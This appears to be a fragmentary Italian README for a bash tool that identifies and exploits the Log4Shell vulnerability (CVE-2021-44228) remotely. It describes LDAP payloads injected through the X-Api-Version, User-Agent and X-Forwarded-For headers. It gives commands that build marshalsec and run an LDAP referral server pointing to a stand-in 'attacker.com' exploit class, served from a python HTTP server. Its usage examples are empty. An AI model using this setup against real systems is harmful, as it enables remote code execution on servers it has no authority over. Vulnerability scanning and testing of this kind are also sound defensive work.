
Script in bash che permette di identificare la vulnerabilità Log4j CVE-2021-44228 da remoto.
Script in bash che permette di identificare e/o sfruttare la vulnerabilità Log4shell in remoto. Questo strumento esegue diversi test utilizzando payload LDAP e header X-Api-Version, User-Agent e X-Forwarded-For.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Abilitiamo un server HTTP python3 -m http.server 8080
Avere Java installato #sudo apt install default-jre
Avere Curl installato #sudo apt-get install curl
Inserisci i seguenti parametri:
#Esempio scansione di applicazione in rete interna:

#Esempio scansione di applicazione su internet:
